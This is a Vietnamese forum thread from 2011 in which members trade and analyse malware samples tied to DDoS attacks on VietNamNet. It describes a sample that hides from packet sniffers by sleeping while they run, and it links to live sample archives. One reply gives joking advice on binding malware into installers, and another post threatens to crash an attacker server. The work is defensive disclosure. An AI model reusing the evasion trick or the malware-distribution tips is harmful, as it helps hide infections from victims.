Xr09999-PC\Xr0.9999 TuneUp Utilities svchost.exe 108 1.12 MB Host Process for Windows Services taskhost.exe 1660 2.45 MB Xr09999-PC\Xr0.9999 Host Process for Windows Tasks svchost.exe 2828 1.78 MB Host Process for Windows Services mscorsvw.exe 2624 2.49 MB .NET Runtime Optimization Service wmpnetwk.exe 1784 8.5 MB Windows Media Player Network Sharing Service svchost.exe 4268 7.9 MB Host Process for Windows Services lsass.exe 504 0.15 2.17 kB/s 3.14 MB Local Security Authority Process lsm.exe 516 1.26 MB Local Session Manager Service csrss.exe 444 0.85 1.76 kB/s 1.68 MB Client Server Runtime Process winlogon.exe 704 1.9 MB Windows Logon Application explorer.exe 2076 0.95 28.63 MB Xr09999-PC\Xr0.9999 Windows Explorer RtHDVCpl.exe 2412 7.39 MB Xr09999-PC\Xr0.9999 Realtek HD Audio Manager ATKOSD2.exe 2420 944 kB Xr09999-PC\Xr0.9999 ATKOSD2 HControlUser.exe 2432 540 kB Xr09999-PC\Xr0.9999 HControlUser SynTPEnh.exe 2448 1.32 2.68 MB Xr09999-PC\Xr0.9999 Synaptics TouchPad Enhancements SynTPHelper.exe 2808 592 kB Xr09999-PC\Xr0.9999 Synaptics Pointing Device Helper IDMan.exe 2456 5.45 MB Xr09999-PC\Xr0.9999 Internet Download Manager (IDM) IEMonitor.exe 2780 1.44 MB Xr09999-PC\Xr0.9999 Internet Download Manager agent for click monitoring in IE-based browsers sidebar.exe 2564 3.52 2.38 kB/s 22.7 MB Xr09999-PC\Xr0.9999 Windows Desktop Gadgets Integrator.exe 2152 0.20 49.83 MB Xr09999-PC\Xr0.9999 TuneUp Utilities - Start Center chrome.exe 5380 0.34 31.46 kB/s 29.33 MB Xr09999-PC\Xr0.9999 Google Chrome chrome.exe 5484 9.25 MB Xr09999-PC\Xr0.9999 Google Chrome chrome.exe 5544 15.7 MB Xr09999-PC\Xr0.9999 Google Chrome chrome.exe 5600 21.49 MB Xr09999-PC\Xr0.9999 Google Chrome rundll32.exe 2544 3.85 MB Xr09999-PC\Xr0.9999 Windows host process (Rundll32) chrome.exe 3608 9.9 MB Xr09999-PC\Xr0.9999 Google Chrome ProcessHacker.exe 3620 27.37 49.46 kB/s 12.89 MB Xr09999-PC\Xr0.9999 Process Hacker MOM.exe 2932 0.05 24.56 MB Xr09999-PC\Xr0.9999 Catalyst Control Center: Monitoring program CCC.exe 3228

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 Xr0.9999: Cậu đọc theo hướng dẫn của Bolzano để up thông tin AutorRuns nhé ! Post một đống vậy thì em quáng gà luôn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Đây anh N ơi anh xem thử cái file trên máy em. Em đã quét với KIS rồi và xem Signature của file này rồi không vấn đề gì.(máy em 64bit nha) Gửi mẫu lên theo yêu cầu của anh luôn :D Code:

http://www.mediafire.com/?qmzxr23aaa9ofi7

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cam on quygia128. Cậu up giùm tui file goopdate.dll luôn nhé !

Phân tích tính chất vài trận DDoS HVA vừa qua.

duynhi1978 — GMT

http://www.mediafire.com/?sq79g0owfhdbt9g GoogleCrashHandler.exe và goopdate.dll của tui. làm ơn.thanks

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Em gửi anh link mới với 2 file GoogleCrashHandler.exe(giống file em đã up) và goopdate.dll em gộp chung vào file rar luôn cho dể phân tích (tránh nhầm lẫn giữa các mẫu khác nhau) Link: Code:

http://www.mediafire.com/?86gmzq22wztpzzv

------------- PS: anh N sẵn tiện đây cho em hỏi là anh dùng tool gì để Decompiler C và C++ vậy ?. Em đang có mấy cái file C++ muốn phân tích. Tìm trên google nhưng tool đa số không được tốt cho lắm. Anh chỉ cần nói tên thôi em sẽ tự tìm. Cảm ơn anh!

Phân tích tính chất vài trận DDoS HVA vừa qua.

rookey — GMT

Chào mọi người. Chiều nay em dùng Firefox thì vào được VietNamNet (Google Chrome thì không).Báo VNN đã thông báo tới độc giả sự cố bị DDoS cả tháng qua. Hiện VNN đang thông báo nhờ tất cả mọi người từ nhà dịch vụ tới cá nhân đóng góp vào việc tìm diệt Botnet này. Mừng đã vào được VNN một cách nhanh chống .

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Buồn một chút là không nhắc gì tới HVA cả, nếu không có HVA thì mấy ai biết được ITunesHelper và GoogleCrashHandler. Tuy nhiên, vẫn có CMC trong list các đơn vị hổ trợ. Và chia buồn với mấy sứ giả cãi thiện chiến của BKAV, BKIS là không có tên của mấy anh trong đó ! Hoan hô Bolzano của CMC ! Công sức của anh em HVA ta, tuy không và chưa được ai công nhận, nhưng đã đến lúc thu được kết quả rồi. Giống như những nhà từ thiện chân chính, cần gì báo đài tung hô, chỉ cần mình làm đúng, hết lòng vì việc mình làm, phải không các bạn ? Còn phần em thì vẫn tiếp tục chờ và tìm mẫu giấu mặt khác đang DDOS VNN, vẫn tiếp tục RCE, phân tích và công bố các mẫu khác của stl. Không ai cấm em được việc em đang làm ! Mong mọi người tiếp tục ủng hộ, tham gia, mạnh dạn vạch trần, đánh sập tụi stl xấu xa, giấu mặt, dơ bẩn, hèn hạ này ! Tự dưng em tự hỏi, nếu lần này, chúng ta, HVA, cộng đồng IT VN ta, phải thua tụi nó giữa chừng, thì mai mốt, vô hình, không có nước nào trên thế giới giống VN ta, có một thế lực hắc ám, "tử thần thực tử" cho những kẻ mà "ai cũng biết là ai đó" lơ lững trên đầu mình, sẵn sàng dập mình, đập chết mình và mọi người, bóp nghẹt, đàn áp, khống chế, đe doạ mọi người ! Các bạn chịu được không, hảy suy nghĩ cho kỹ ????????????????? Tự hỏi chính lương tâm các bạn đi ! Xã hội bây giờ là xã hội dân chủ, tự do thông tin, tự do chính kiến rồi, các bạn à, nếu các bạn đang làm đúng, không làm gì sai, phạm pháp, tại sao các bạn lại phải sợ ?! 1. Việc chúng ta đang làm, đấu tranh với stl có phạm pháp không các bạn ? Hoàn toàn không ! 2. Chúng ta có chống phá chế độ, nhà nước không các bạn ? Hoàn toàn không ! 3. Chúng ta có xúc phạm, đả kích một công dân chân chính VN nào không các bạn ? Hoàn toàn không ! 4. Chúng ta làm việc này, có thu lợi, mang lại đồng tiền, lợi ích cho cá nhân không các bạn ? Hoàn toàn không ! 5. Chúng ta đang đấu tranh với tội phạm mạng, tội phạm xã hội phải không các bạn ? Hoàn toàn đúng ! 6. Chúng ta tham gia đấu tranh với stl để bảo vệ chính mình, bảo vệ mọi người, bạn bè, thân thuộc, bảo vệ tự do thông tin, tự do Internet, tự do phát ngôn, chính kiến của chúng ta..., đúng không các bạn ? Hoàn toàn đúng ! .... Còn nhiều cái khác nữa, mong các bạn hãy dũng cảm đứng lên, cùng tham gia góp sức để đập tan tụi stl này ! Tà không bao giờ thắng chính được, các bạn à !

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

TQN wrote:

Buồn một chút là không nhắc gì tới HVA cả, nếu không có HVA thì mấy ai biết được ITunesHelper và GoogleCrashHandler. Tuy nhiên, vẫn có CMC trong list các đơn vị hổ trợ. Và chia buồn với mấy sứ giả cãi thiện chiến của BKAV, BKIS là không có tên của mấy anh trong đó ! Hoan hô Bolzano của CMC ! Công sức của anh em HVA ta, tuy không và chưa được ai công nhận, nhưng đã đến lúc thu được kết quả rồi. Giống như những nhà từ thiện chân chính, cần gì báo đài tung hô, chỉ cần mình làm đúng, hết lòng vì việc mình làm, phải không các bạn ? Còn phần em thì vẫn tiếp tục chờ và tìm mẫu giấu mặt khác đang DDOS VNN, vẫn tiếp tục RCE, phân tích và công bố các mẫu khác của stl. Không ai cấm em được việc em đang làm ! Mong mọi người tiếp tục ủng hộ, tham gia, mạnh dạn vạch trần, đánh sập tụi stl xấu xa, giấu mặt, dơ bẩn, hèn hạ này ! Tự dưng em tự hỏi, nếu lần này, chúng ta, HVA, cộng đồng IT VN ta, phải thua tụi nó giữa chừng, thì mai mốt, vô hình, không có nước nào trên thế giới giống VN ta, có một thế lực hắc ám, "tử thần thực tử" cho kẻ mà "ai cũng biết là ai đó" lơ lững trên đầu mình, sẵn sàng dập mình, đập chết mình, bóp nghẹt, đàn áp, khống chế, đe doạ mình ! Các bạn chịu được không ????????????????? Tự hỏi chính lương tâm các bạn đi ! Xã hội bây giờ là xã hội dân chủ, tự do thông tin, tự do chính kiến rồi, các bạn à ! 1. Việc chúng ta đang làm, đấu tranh với stl có phạm pháp không các bạn ? Hoàn toàn không ! 2. Chúng ta có chống phá chế độ, nhà nước không các bạn ? Hoàn toàn không ! 3. Chúng ta có xúc phạm, đả kích một công dân chân chính VN nào không các bạn ? Hoàn toàn không ! 4. Chúng ta làm việc này, có thu lợi, mang lại đồng tiền, lợi ích cho cá nhân không các bạn ? Hoàn toàn không ! 5. Chúng ta đang đấu tranh với tội phạm mạng, tội phạm xã hội phải không các bạn ? Hoàn toàn đúng ! 6. Chúng ta tham gia đấu tranh với stl để bảo vệ chính mình, bảo vệ mọi người, bạn bè, thân thuộc..., đúng không các bạn ? Hoàn toàn đúng ! .... Còn nhiều cái khác nữa, mong các bạn hãy dũng cảm đứng lên, cùng tham gia góp sức để đập tan tụi stl này ! Tà không bao giờ thắng chính được, các bạn à !

Chắc anh lại uống quá chén rùi ;) Bình tĩnh anh ơi, để có sức mà dập tắt nạn stl chứ :)) Mọi người vẫn ủng hộ việc làm của các anh mà :D Sau khi xong cái đám tạp nham đó thì có khối người mời anh đi nhậu ý :D lúc đó có uống nổi không :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hôm nay anh không uống em à, về tới nhà thì mệt lắm rồi. Anh chỉ nói những gì cần nói, .lht. ! Chỉ bức xúc những gì đang xảy ra trước mắt mình mà phải nói thôi ! Mình cứ tâm niệm mình đang làm đúng, không có gì phạm pháp thì mắc gì mình phải sợ, em nhỉ ! Anh vừa phân tích xong cái rdpuser.mof, cho nó move vào thư mục Done của QTTask.zip là vừa. Còn cái cversions.2.db, thằng này chính là core như Dao360.dll.mui hồi xưa, sẽ tốn nhiều công sức hơn, nhưng sẽ không bỏ cuộc, phải làm cho tới lần này. Lần này, nói trước cái HTTP server mà mấy anh POST thông tin của victim về sẽ bị em vạch trần, và em sẽ đi theo đường POST chính thống của mấy anh đấy ! Thử xem cái nginx webserver của mấy anh có chịu nổi mấy cái HTTP POST dị dạng không ? Em chả cần hack hiếc gì cả, chỉ cần cái nginx của mấy anh crash là được rồi ! Hình minh hoạ layout của code của rdpuser.mof:

Nhìn vào hình này, các bạn cũng thấy, stl coder code chỉ 6 hàm, còn DllMain là prototype bắt buộc của DLL, vậy mà chỉ vì vài hàm trong 6 hàm đó dùng CString, mà stl coder đã mang vào chương trình một đống các hàm (gần 30 hàm) của các class ATL::CString, ATL::CSimpleString, ATL::CWin32Heap, ATL::CAtlStringMgr, và một đống các hàm khác của STL - C++ Standard Template Library , cũng vì lai giữa C và C++, dùng lẫn lộn giữa new và malloc mà phải chịu vậy ! Trên hình, đoạn màu xanh nhạt là C/C++ library function, đoạn màu xanh đậm là code của stl coder. Nói phải có bằng có chứng, chứ không mấy anh stl coder nói em nói mò, phán bậy ! Em nói đúng không mấy anh stl, xem lại code của rdpuser.mof đi ! Sợ mấy anh không nhớ rdpuser.mof là gì, em xin nhắc luôn, tên gốc lúc build của nó là advapi32.dl (mạo danh advapi32.dll, core dll của MS), build vào ngày 22/11/2010 đó !

Phân tích tính chất vài trận DDoS HVA vừa qua.

mainguyendl — GMT

songvedemdl wrote:

bolzano_1989 wrote:

mainguyendl có thể gửi 2 file sau lên để mọi người kiểm tra thêm: c:\program files\unikey v408\unikey.exe c:\program files\internet download manager\idman.exe
bạn đang nói mình ha? hay mainguyendl? nếu nói mình thì tối đi làm về mình se up lên mediafire cho bạn, thank bạn nhiều!!

nhầm tên đó mà :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

phanledaivuong wrote:

TQN wrote:

Mình chỉ nhắc mấy anh em sv FPT đó là được rồi, bolzano. Mấy em sv FPT đó chịu khó remove cái Form3 ra giùm đi. Kiếm tiền thì nên quang minh chánh đại chứ, đừng làm những hành động vậy. Đã có ý tưởng tốt, viết phần mềm free thì free cho trót ! Em nhớ hồi xưa ông thầy dạy Anh Văn hồi PT của em có chế một câu: "Nhân bất học bất chi lý, trẻ không học lớn lên chích ma tuý, mình có học lớn lên làm đại uý" ;) Đùa một chút cho mọi anh em bớt căng thẳng.
Thấy cu "thắng" học FPT tranh luận bên 4rum của cmc là do website bị "hacker" hack vào nên chèn trojan vào bản cài mà anh. Nhưng hình như là mấy cái Form3 này như anh nói là do chương trình của cu cậu bật lên để auto click. chứ không phải là do file exe nào của thằng "hacker" vì chắc chả thằng nào hâm lại đi resource cái toitietkiem.vn ra để lấy source rồi lại code lại thêm mấy cái Form3 -> build lại -> lại up lên server của toitietkiem.vn. Thường thì sẽ Binder cái malware vào :D. kinh nghiệm code phần mềm chứa mã độc là nên Binder mã độc vào chứ đừng code chèn vào phần mềm =)) để lúc bị phát hiện còn dễ cãi =)). tốt nhất là link download phần mềm từ trang chủ nên die =)) để cho người ta download phần mềm từ các diễn đàn khác ;)) mấy em nó mới vào đời, chưa có kinh nghiệm mấy vụ này. zzz Em nói sai chỗ nào mong anh em chỉ bảo hộ :D

Chủ dự án ToiTietKiem.Vn Phạm Ngọc Thắng đã chính thức lên tiếng nhận lỗi ở diễn đàn CMCLab Support của CMC InfoSec trước cộng đồng người dùng về vụ việc phần mềm Toitietkiem.vn Professional được cài trojan: Mọi người có thể đọc chi tiết ở địa chỉ sau: Toitietkiem.vn Professional – Tiết kiệm điện tối ưu cho máy tính http://support.cmclab.net/vn/ung-dung-tien-ich/toitietkiem-vn-professional-tiet-kiem-dien-toi-uu-cho-may-tinh/

ngocthang wrote:

Chào các bạn, Sau ít ngày điều tra thì cuối cùng nhóm cũng tìm ra thủ phạm và xin được chính thức trả lời như sau: Thật đáng xấu hổ khi "hacker" đã gây ra vụ việc lần này lại chính là 1 thành viên trong nhóm phát triển ToiTietKiem. Vì 1 số lí do tế nhị và "hacker" này đã quá xấu hổ trước hành vi của mình nên tôi xin phép đc giấu tên tuổi, danh tính. Thay mặt cho nhóm phát triển, tôi với tư cách là chủ dự án, đồng thời là trưởng nhóm, dù ko trực tiếp thực hiện nhưng cũng xin NHẬN LỖI TRƯỚC CỘNG ĐỒNG VỀ VỤ VIỆC CÀI TROJAN VÀO PHẦN MỀM TOITIETKIEM lần này. Nay bản sạch virus đã được public trở lại, mong nhận được SỰ THA THỨ VÀ TIẾP TỤC ỦNG HỘ từ phía người dùng. Toàn bộ vụ việc được tóm gọn như sau: - Vào khoảng cuối tháng 6, đầu tháng 7, khi các event của ToiTietKiem đc tổ chức sôi động nhất ở các trường ĐH lớn tại HN thì lượng người dùng ToiTietKiem tăng vọt, đạt khoảng 350.000 lượt dùng lúc đó. 1 thành viên trong nhóm thấy cái lợi thu được từ cộng đồng khá đông đảo này nên đã bí mật chèn code trojan vào ToiTietKiem và cho phát tán. Về cơ bản, trojan này chỉ là 1 trình duyệt mini, tự động click quảng cáo để thu lợi nên ko gây hại gì cho máy người dùng. Người dùng cài đặt ToiTietKiem từ 1/7/2011 đến nay, chỉ cần gỡ bản cũ ra và cài lại bản sạch là có thể tiếp tục sử dụng. Người dùng cài trước 1/7/2011 thì không cần phải lo lắng. - Các chứng cứ tiếp theo như mất acc FTP... chỉ là do thành viên này dựng lên để đánh lừa hướng điều tra và tạo bằng chứng vô can cho mình. Dưới đây là ảnh thành viên này đã thu được số tiền từ trojan click quảng cáo "lậu" do linkbucks trả, 5,29$, 1 cái giá quá rẻ mạt cho tiếng tăm mà ToiTietKiem xây dựng gần 2 năm trời.

Để xảy ra vụ việc đáng tiếc lần này, người đáng trách nhất chính là TÔI. Dù ko trực tiếp gây ra, nhưng với tư cách là chủ dự án đồng thời là trưởng nhóm phát triển, tôi xin nhận 100% trách nhiệm về mình. Xin được gửi lời xin lỗi chân thành nhất đến cộng đồng người sử dụng, xin lỗi vì đã làm ảnh hưởng đến uy tín của trường, của nhà tài trợ. Đồng thời, thành viên này cũng chính thức bị sa thải ra khỏi nhóm vì hành vi đạo đức ko thể chấp nhận được của mình. Cảm ơn những người anh em ở CMCLAB và HVA Online đã kịp thời phát hiện và cảnh báo virus. Sau bài học đắt giá này, tôi xin được khắc cốt ghi tâm những kinh nghiệm xương máu. Cam kết ko bao giờ để xảy ra tình trạng tương tự, đặc biệt xem xét lại từ khâu phát triển phần mềm đến khâu phân phối sản phẩm ra thị trường. Sau cùng, xin gửi lại các bạn link download bản ToiTietKiem sạch 100% : http://www.mediafire.com/?tq7n9t664fsxs28 Một lần nữa, xin lỗi vì tất cả, mong được tha thứ và tiếp tục giang tay đón nhận từ phía cộng đồng! Trân trọng cảm ơn,

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc — GMT

Nhờ anh TQN khám dùm mấy em này

http://www.mediafire.com/?y68d1cgi07y794a

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

angel-pc wrote:

Nhờ anh TQN khám dùm mấy em này
http://www.mediafire.com/?y68d1cgi07y794a

Mấy con này đã có từ lâu lắm rồi. Mấy con này có nguồn từ TQ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Xin cảnh báo các bạn: Những ai không rành về malware và không có sự bảo vệ cần thiết trên máy của mình mà tò mò download những "mẫu mã" đăng trong chủ đề này về thì hoàn toàn tự chịu trách nhiệm. HVA không chịu trách nhiệm cho quyết định "tò mò" của các bạn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đã phân tích xong rdpuser.mof, chỉ có vài điểm chú ý sau:

Thằng làm nhiệm vụ như StaticCaches.dat hồi xưa là thằng \Protect\History.db. Còn thằng cversions2.db thì như dao360.dll.mui hồi xưa, đứng giữa điều phối các file mèo què kia, up thông tin của victim, download new mèo què, bot.... Sau khi kiểm tra có 1 trong 2 file trên, rdpuser.mof sẽ LoadLibraryW 1 trong 2 file đó lên. Bị "bạch hoá" bắt đầu từ đây, phải không mấy anh stl:

Lúc trước, có người hỏi tui, ông biết nhiều vậy, bộ ông không bao giờ viết virus, hack hiếc, tham gia UG à. Em cười lớn, nếu vậy thì mấy ông làm chìa khoá ngồi ở lề đường, mấy thằng sửa xe ngoài Bùi Hửu Nghĩa, Nguyễn Chí Thanh, chợ Tân Thành chắc bị CA chụp cổ hết rồi quá ! Phải không các bạn ? Nếu các bạn nào thích nghiên cứu về malware, RCE, cversions.2.db là một target xứng đáng để các bạn phân tích, có rất nhiều kỹ thuật hay trong đó. Nó với dao360.dll.mui hồi xưa là 1, cùng 1 code base, chỉ modify "sơ sơ" thôi. Không đủ để "her ríc tíc" (tự dưng quên mất tiêu) gì đó của AV không phát hiện ra ! Mấy anh stl coder giỏi quá, tự code hay tìm ở đâu vậy ? Cho em đi làm "đệ tử" với -:|-

Phân tích tính chất vài trận DDoS HVA vừa qua.

pro_tc_08 — GMT

sao www.Vietnamnet.vn ko vô được mà gõ wwwz.vietnamnet.vn lại vô đc thế mấy a?

Phân tích tính chất vài trận DDoS HVA vừa qua.

insanity — GMT

từ bữa tấn công tới giờ , hôm nay e mới thấy vtv phản ánh vnn bị tấn công ddos http://vietnamnet.vn/vn/cong-nghe-thong-tin-vien-thong/40581/vtv-phan-anh-vu-vietnamnet-bi-tan-cong-ddos.html

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc — GMT

- Theo phân thích thì ip ddos vnn hầu hết là ip vn, vậy mà 12h đêm vào vẫn không được thì thật lạ không lẽ máy zoombie mở 24/24 nhiều vậy sao @pro_tc_08: làm sao bạn biết được subdomain wwwz.vietnamnet.vn hay vậy, hay bạn là nhân viên của vnn, và bạn có biết là trước có một người cũng nói địa chỉ vietnamnet.vn thì vào không được nhưng có thể vào bằng địa chỉ www.vietnamnet.vn và sau đó thì www.vietnamnet.vn cũng không thể vào được không

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

Đồng ý với angel-pc, làm sao bạn pro_tc_08 là làm sao bạn biết được subdomain??? Bạn mới gia nhập HVA ngày 23/9/2011, 1 post. Là sao? Nhưng cũng thank pro_tc_08 nên mình mới vào được VNN, đọc được bài thông báo tình trạng kỹ thuật của VNN, thấy có nói đến CMC mà không nói đến HVA, không biết anh bolzano_1989 làm bên đó có thông tin gì không? Không biết CMC có "nhắc khéo" VNN là có sự giúp đỡ rất lớn từ HVA không?

Phân tích tính chất vài trận DDoS HVA vừa qua.

pro_tc_08 — GMT

các bạn có vẻ bị hội chứng stl rồi,mình theo dõi chủ đề này lâu rồi, cũng tò mò và tự seach gg, vô tình biết đc thôi, thấy mọi ng ai cũng bảo ko vô đc mà mình biết cách nên mình mới tạo 1 nick @@ .mình chỉ là dân kinh tế,ko biết nhiều về it

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Trên VNN có bài nói về vụ DDos này và chuyên gia của Bkav khuyên mọi người nên cài 1 phần mềm diệt virus của Việt Nam thì sẽ cập nhật virus nhanh hơn, nói thì như vậy nhưng thực tế em đã test bản Bkav Internet security pro (16/9/2011) quét tất cả những file chứa malware mà anh TQN đã public gần cả tháng nay mà nó chẳng nhận dạng được virus nữa nói chi tới việc diệt. Không hiểu cái phần mềm "hàng đầu" thế giới này làm gì nữa (nhân viên kỹ thuật của Bkav có thật sự quan tâm đến đám virus này không ? hay họ không biết phải lấy mẫu ở đâu, hay họ quá tự hào về cái gọi là "điện toán đám mây" ?) Ai đang dùng Bkav hãy test thử coi có đúng như vậy không nhé (bà con cập nhật dữ liệu mới nhất thử xem có diệt được không ?). KIS thì đã nhận dạng và diệt sạch.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

quygia128 wrote:

Trên VNN có bài nói về vụ DDos này và chuyên gia của Bkav khuyên mọi người nên cài 1 phần mềm diệt virus của Việt Nam thì sẽ cập nhật virus nhanh hơn, nói thì như vậy nhưng thực tế em đã test bản Bkav Internet security pro (16/9/2011) quét tất cả những file chứa malware mà anh TQN đã public gần cả tháng nay mà nó chẳng nhận dạng được virus nữa nói chi tới việc diệt. Không hiểu cái phần mềm "hàng đầu" thế giới này làm gì nữa (nhân viên kỹ thuật của Bkav có thật sự quan tâm đến đám virus này không ? hay họ không biết phải lấy mẫu ở đâu, hay họ quá tự hào về cái gọi là "điện toán đám mây" ?) Ai đang dùng Bkav hãy test thử coi có đúng như vậy không nhé (bà con cập nhật dữ liệu mới nhất thử xem có diệt được không ?). KIS thì đã nhận dạng và diệt sạch.

Chuyên gia đấy bên CMC không phải của BKIS, cũng không nên anti BKIS quá như vậy bro à

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Chuyên gia đấy bên CMC không phải của BKIS

Cảm ơn bạn đã đính chính thông tin này. 1.Nhưng mình nói là dựa theo thực tế và mình đã test chứ không nói bừa. 2.Mình không có lý do gì để anti Bkav cả, là người Việt mình ủng hộ phần mềm Việt chỉ có điều sự thật nó khác với lời nói mà thôi. Bạn có thể tin tưởng nhưng hãy tin tưởng vào cái mà bạn "nhận được" khi dùng Bkav. Mình xin hỏi bạn là đã test hay chưa ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

quygia128 wrote:

Chuyên gia đấy bên CMC không phải của BKIS
Cảm ơn bạn đã đính chính thông tin này. 1.Nhưng mình nói là dựa theo thực tế và mình đã test chứ không nói bừa. 2.Mình không có lý do gì để anti Bkav cả, là người Việt mình ủng hộ phần mềm Việt chỉ có điều sự thật nó khác với lời nói mà thôi. Bạn có thể tin tưởng nhưng hãy tin tưởng vào cái mà bạn "nhận được" khi dùng Bkav. Mình xin hỏi bạn là đã test hay chưa ?

1 - Bạn là người đã test BKAV rồi thì thay vì chỉ trích hãy gửi ý kiến về những vấn đề của BKAV mà theo bạn là chưa làm được tới bộ phận chăm sóc khách hàng hay bộ phận kỹ thuật của BKIS như vậy mới là ủng hộ sản phẩm của người Việt 2 - Mình là end-user chứ không phải là Tester nên không rảnh để test 1 sản phẩm nào đó mà mình không có nhu cầu sử dụng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Kinh nghiệm mới khi RCE malware của stl mà tui vừa phát hiện ra: 1. Luôn Ctrl-S, Ctrl-A liên tục. 2. Đừng ôm con nhỏ trong lòng khi đang mở malware với OllyDbg hay IDA, nó cứ chòi chòi, đòi gõ bàn phím hoài, F5 hay F9 một cái là tiêu em ;) Mà không cho là nó la mới mệt chứ !

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

TQN wrote:

Kinh nghiệm mới khi RCE malware của stl mà tui vừa phát hiện ra: 1. Luôn Ctrl-S liên tục. 2. Đừng ôm con nhỏ trong lòng khi đang mở malware với OllyDbg hay IDA, nó cứ chòi chòi, đòi gõ bàn phím hoài, F5 hay F9 một cái là tiêu em ;) Mà không cho là nó la mới mệt chứ !

Chưa gì bác TQN đã lo huấn luyện thế hệ kế thừa :-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, mới có 16 tháng mà huấn luyện cái gì. Thấy ba nó ngồi máy là nó đòi ẵm mới chịu, rồi lấy chân tay bé xíu đập vô bàn phím đấy chứ !

Phân tích tính chất vài trận DDoS HVA vừa qua.

A.T — GMT

hổ phụ sinh hổ tử đây :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hôm qua nhậu quá giờ ngu ngu rồi. Thôi RCE tiếp con cversions.2.db của mấy anh stl để giải say:-) Phân tích mấy hàm này, giựt mình, tỉnh rượu luôn :-( Mấy anh stl chơi thâm ha ! Lần này sau một thời gian theo dõi HVA, thấy HVA hướng dẫn bà con dùng Wireshark, SmartSniff... để monitor và bắt mèo què của mấy anh, mấy anh chơi viết code detect các tool đó luôn ha ! Nhưng mà các tool capture, sniffer thì nhiều vô số kể, làm sao các anh stl chống hết được ha ? Bản cversions.2.db này đang detect 3 tool sau: 1. Wireshark.exe, find wndname = The Wireshark Network Analyzer 2. smsniff.exe, find wndname = SmartSniff 3. EtherD.exe, find wndname = EtherDetect Packet Sniffer

Trong list trên lại không có TCPView, CurrPorts (cũng của Nirosoft). Các packet monitor tool trên máy em đang có: netcap của Windows Support Tools, CommView, MS Network Monitor, Cain&Abel, và NetworkMiner http://www.netresec.com/?page=NetworkMiner. Em kết nhất là cái NetworkMiner này, opensource, gọn nhẹ, portable. Thử xem mấy anh stl có add code detect hết nổi không ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Hì hì, các bạn stl detect mấy cái tools xong rồi làm gì? Chắc "kill" hết mấy cái processes chạy mấy cái tools phải không nào? Hoan hô các bạn stl :-) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 — GMT

malwares của stl sau khi detect thay mấy cái tools sẽ không kill hết mấy cái processes ấy mà tự mình exit, trốn để tránh bị phát hiện phải không anh TQN :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, không phải nó kill các tool đó hay exit đâu bà con ! Thâm hơn nữa kìa, nó sẽ đi ngủ, chừng nào tụi kia đi hết nó mới thức dậy và phang tiếp :-( cversions.2.db sinh rất nhiều thread, mổi thread làm nhiệm vụ khác nhau. Code detect các tool sniffer được đặt nằm trong 1 thread. Thread này gần như loop vô tận, và liên tục detect các snifffer. Nếu detect thấy, nó sẽ set 1 cờ, em gọi là g_dwNotSafeToConnect.

Các thread khác làm làm nhiệm vụ upload victim infos và download sẽ liên tục check cờ này, nếu thấy not safe, nó sẽ không connect tới các HTTP server định sẵn, thay vào đó các thread sẽ đi ngủ (Sleep) ;) Vì vậy, user bình thường, khi bật Wireshark, Smsniff... lên sẽ không thấy các connection vào ra từ cversions.2.db này. Khi tắt đi thì cversions.2.db sẽ lại connect. stl coder thâm vậy đó, bà con sợ chưa =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Hì hì, không phải nó kill các tool đó hay exit đâu bà con ! Thâm hơn nữa kìa, nó sẽ đi ngủ, chừng nào tụi kia đi hết nó mới thức dậy và phang tiếp :-( cversions.2.db sinh rất nhiều thread, mổi thread làm nhiệm vụ khác nhau. Code detect các tool sniffer được đặt nằm trong 1 thread. Thread này gần như loop vô tận, và liên tục detect các snifffer. Nếu detect thấy, nó sẽ set 1 cờ, em gọi là g_dwNotSafeToConnect. Các thread khác làm làm nhiệm vụ upload victim infos và download sẽ liên tục check cờ này, nếu thấy not safe, nó sẽ không connect tới các HTTP server định sẵn, thay vào đó các thread sẽ đi ngủ (Sleep) ;) Vì vậy, user bình thường, khi bật Wireshark, Smsniff... lên sẽ không thấy các connection vào ra từ cversions.2.db này. Khi tắt đi thì cversions.2.db sẽ lại connect. stl coder thâm vậy đó, bà con sợ chưa =))

Ha ha, vậy thì bà con chỉ cần cài 1 cái Wireshark và cứ khởi động Wireshark trên máy thì coi như là stl malware sẽ... ngủ triền miên? =)). Kiểu này BKIS bị ế =)) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning — GMT

Vậy là bà con chỉ cần cài mấy tool trên thì malwares sẽ không hoạt động. Không cần cài chương trình diệt virus làm gì :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Thiệt là thâm quá đi, cũng kinh đấy. Thử hỏi có bao nhiêu người online mà bật mấy cái tools kia, đa số nạn nhân sẽ không biết có kết nối hay không có kết nối tới stl sites... Anh TQN gửi mẫu liên tục cho các AVs thì may ra cái đám củ đậu này mới bị tiêu diệt.

Phân tích tính chất vài trận DDoS HVA vừa qua.

A.T — GMT
